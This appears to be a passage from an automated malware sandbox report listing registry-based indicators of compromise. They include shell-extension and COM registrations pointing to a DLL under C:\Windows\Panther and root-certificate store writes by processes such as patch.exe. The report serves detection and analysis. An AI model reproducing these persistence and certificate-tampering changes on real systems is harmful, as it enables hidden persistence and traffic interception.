Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-421 = "Russian Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-582 = "North Asia East Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-652 = "AUS Central Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-262 = "GMT Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-21 = "Cape Verde Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-161 = "Central Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	gsqMDm4xp0qpvH7w0yVvaAb0.exe

Modifies registry class 22 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32\ThreadingModel = "Apartment"	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\CLSID\{1F73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\CLSID	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\CLSID\{2E73E490-044A-BCA3-723A-A31F0132C80A}	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32	lcDq23eDXskQBaEJxI0TthYF.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32\ThreadingModel = "Apartment"	lcDq23eDXskQBaEJxI0TthYF.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\CopyHookHandlers\FileSystemEx\ = "{2E73E490-044A-BCA3-723A-A31F0132C80A}"	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\CLSID\{1F73E490-044A-BCA3-723A-A31F0132C80A}	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\CLSID\{2E73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32	lcDq23eDXskQBaEJxI0TthYF.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\{e357fccd-a995-4576-b01f-234630154e96}\ = "{1A73E490-044A-BCA3-723A-A31F0132C80A}"	lcDq23eDXskQBaEJxI0TthYF.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32\ = "C:\\Windows\\Panther\\UnattendGC\\EEMacro.dll"	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\CopyHookHandlers\FileSystemEx	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32	lcDq23eDXskQBaEJxI0TthYF.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32\ = "C:\\Windows\\Panther\\UnattendGC\\EEMacro.dll"	lcDq23eDXskQBaEJxI0TthYF.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32\ThreadingModel = "Apartment"	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F73E490-044A-BCA3-723A-A31F0132C80A}	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E73E490-044A-BCA3-723A-A31F0132C80A}	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A73E490-044A-BCA3-723A-A31F0132C80A}	lcDq23eDXskQBaEJxI0TthYF.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A73E490-044A-BCA3-723A-A31F0132C80A}\InProcServer32\ = "C:\\Windows\\Panther\\UnattendGC\\EEMacro.dll"	lcDq23eDXskQBaEJxI0TthYF.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\ShellEx\{e357fccd-a995-4576-b01f-234630154e96}	lcDq23eDXskQBaEJxI0TthYF.exe

Modifies system certificate store 2 TTPs 12 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54362000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bf